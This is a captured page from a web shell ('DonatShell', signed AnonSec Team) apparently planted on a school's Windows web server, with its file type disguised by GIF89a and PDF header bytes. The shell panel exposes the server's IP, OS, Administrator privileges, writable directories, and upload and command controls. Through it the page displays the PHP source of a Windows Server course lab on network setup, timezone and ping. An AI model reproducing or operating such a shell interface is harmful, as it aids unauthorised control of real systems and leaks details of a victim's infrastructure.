GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2274/Labs/Lab03/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2274/Labs/Lab03/Lab03.phpinc
<?
// JimMartinson/CST2274/Labs/Lab03/Lab03.phpinc

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // ReplacedNaN
#if ( $_SESSION['userId'] != 1 ) { require('Gradebook/EvaluationSubmission_NOTAVAILABLE.phpinc'); exit; }

require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'.

$disabled = '';
$disabled = ' disabled';
if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? }

?>
<fieldset><legend>Description</legend>
Demonstrate your ability to configure some of your Desktop Experience and Core server settings.
</fieldset>

<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend>
<?=$gradeNote?>
<ol class="count">
	<li>
		Create a directory called <b class="copyText"><?=$evaluationName?></b>. We will use it for all work performed in this lab.
	</li>
	<li>Add a Host-only adapter to both your <?=$serverName?> and <?=$coreServerName?> servers.</li>
	<li>Connect to the Ridgewater VPN.</li>
	<li>Note down the network information of your <?=$serverName?> and <?=$coreServerName?> server's.
		<ol>
			<? $textfile = $courseNumber.'_'.$evaluationName.'_Network_'.$userFileName.'.txt'; ?>
			<li>Create a text document called <b class="copyText"><?=$textfile?></b> in your <b><?=$evaluationName?></b> folder and open it in an editor.</li>
			<li>Open a command prompt on your <?=$serverName?> server and run the command <span class="kbd copyText">ipconfig /all</span>.
				<br>Note down your server's name, the <b>IPv4 address</b> information in the <?=$textfile?> file.
			</li>
			<li>From the command prompt on your <?=$coreServerName?> run the command <span class="kbd copyText">ipconfig /all</span>.
				<br>Note down your server's name, the <b>IPv4 address</b> in the <?=$textfile?> file.
			</li>
			<li>Save the text <?=$textfile?> document.<br>
				<? showBegin('See example text document'); ?><br>
				<pre class="code"><?=$serverName?> 
	IPv4 Address. . . . . . . . . . . : 192.168.56.112
<?=$coreServerName?> 
	IPv4 Address. . . . . . . . . . . : 192.168.56.113</pre>
				<? showEnd (); ?>
			</li>
		</ol>
	</li>
	<li>
		Configure some settings on your Desktop Experience (<?=$serverName?>) server.
		<span class="note normal">These steps must be performed on your <?=$serverName?> server.</span>
		<ol>
			<li>Activate your server.
				<span class="note normal">We no longer need to activate the server as it is a 120 day eval.</span>
				<!--<ol>
					<li>Open an elevated command prompt.</li>
					<li>Enter the commands:<br>
						<span class="kbd copyText">slmgr.vbs /skms 134.29.172.138:1688</span>
						<br><span class="kbd copyText">slmgr.vbs /ato</span>
					</li>
					<li>Open Control Pannel / System and Security / System.</li>
					<? $screenshot1 = $courseNumber.'_'.$evaluationName.'_DE_Active_'.$userFileName.'.png'; ?>
					<li>Take a screenshot of the System windows and save it as <b class="copyText"><?=$screenshot1?></b> in your <b><?=$evaluationName?></b> folder.
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/DEactivate.png" alt="DE server Date Time example"/><br>
						<? showEnd (); ?>
					</li>
				</ol>-->
			</li>
			<li>Configure the Timezone and the Date and Time if needed.
				<ol>
					<li>Use any method to configure the timezone to Central Time.</li>
					<li>If the date or time appear to be incorrect, configure them as well.</li>
					<li>Open the <b>Date and Time control panel</b>.</li>
					<? $screenshot2 = $courseNumber.'_'.$evaluationName.'_DE_DateTime_'.$userFileName.'.png'; ?>
					<li>Take a screenshot of and save it as <b class="copyText"><?=$screenshot2?></b> in your <b><?=$evaluationName?></b> folder.
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/DEdatetime.png" alt="DE server Date Time example"/><br>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Use any method to allow ping on your DE (<?=$serverName?>) server.</li>
		</ol>
	</li>
	<li>
		Configure some settings on your Core (<?=$coreServerName?>) server.
		<span class="note normal">These steps must be performed on your <?=$serverName?> server.</span>
		<ol>
			<li>Activate your server.
				<span class="note normal">We no longer need to activate the server as it is a 120 day eval.</span>
				<!--<ol>
					<li>Enter the commands:<br>
						<span class="kbd copyText">slmgr.vbs /skms 134.29.172.138:1688</span>
						<br><span class="kbd copyText">slmgr.vbs /ato</span>
						to activate your server using the school's KMS server.
					</li>
					<li>Run sconfig and select <span class="kbd">11</span> Windows Activation.
						<br>Then select <span class="kbd">1</span> Display License info
					</li>
					<? $screenshot4 = $courseNumber.'_'.$evaluationName.'_Core_Active_'.$userFileName.'.png'; ?>
					<li>Take a screenshot of and save it as <b class="copyText"><?=$screenshot4?></b> in your <b><?=$evaluationName?></b> folder.
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/COREactivate.png" alt="DE server Date Time example"/><br>
						<? showEnd (); ?>
					</li>
				</ol>-->
			</li>
			<li>Configure the Timezone and the Date and Time if needed.
				<ol>
					<li>Run sconfig and select <span class="kbd">9</span> Date and Time.</li>
					<li>Configure the timezone to Central Time.</li>
					<li>If the date or time appear to be incorrect, configure them as well.</li>
					<? $screenshot5 = $courseNumber.'_'.$evaluationName.'_Core_DateTime_'.$userFileName.'.png'; ?>
					<li>Take a screenshot of and save it as <b class="copyText"><?=$screenshot5?></b> in your <b><?=$evaluationName?></b> folder.
						<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
						<img src="images/COREdatetime.png" alt="DE server Date Time example"/><br>
						<? showEnd (); ?>
					</li>
				</ol>
			</li>
			<li>Use any method to allow ping on your Core (<?=$coreServerName?>) server.</li>
		</ol>
	</li>
	<li>Ping your your Desktop Experience (<?=$serverName?>) server's IP address.
		<span class="note normal">This step must be performed from your <?=$coreServerName?> server.</span>
		<ol>
			<li>From a command prompt ping your Desktop Experience server's IP address.</li>
			<? $screenshot6 = $courseNumber.'_'.$evaluationName.'_Core_PingDE_'.$userFileName.'.png'; ?>
			<li>Take a screenshot of and save it as <b class="copyText"><?=$screenshot6?></b> in your <b><?=$evaluationName?></b> folder.
				<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
				<img src="images/COREping.png" alt="DE server Date Time example"/><br>
				<? showEnd (); ?>
			</li>
		</ol>
	</li>
	<li>Ping your your Core (<?=$coreServerName?>) server's IP address.
		<span class="note normal">This step must be performed from your <?=$serverName?> server.</span>
		<ol>
			<li>From a command prompt ping your core server's IP address.</li>
			<? $screenshot3 = $courseNumber.'_'.$evaluationName.'_DE_PingCore_'.$userFileName.'.png'; ?>
			<li>Take a screenshot of and save it as <b class="copyText"><?=$screenshot3?></b> in your <b><?=$evaluationName?></b> folder.
				<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
				<img src="images/DEping.png" alt="DE server Date Time example"/><br>
				<? showEnd (); ?>
			</li>
		</ol>
	</li>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:<?
$fileList = array(
	
	$screenshot2,
	$screenshot3,
	
	$screenshot5,
	$screenshot6,
	$textfile,
);
	natcasesort($fileList);
						foreach ($fileList as $fileName) {
?>
				<br><?=$fileName?>
<?
						}
?>
			</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li>
		</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
  </li>
<? /**/ ?>
</ol>
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team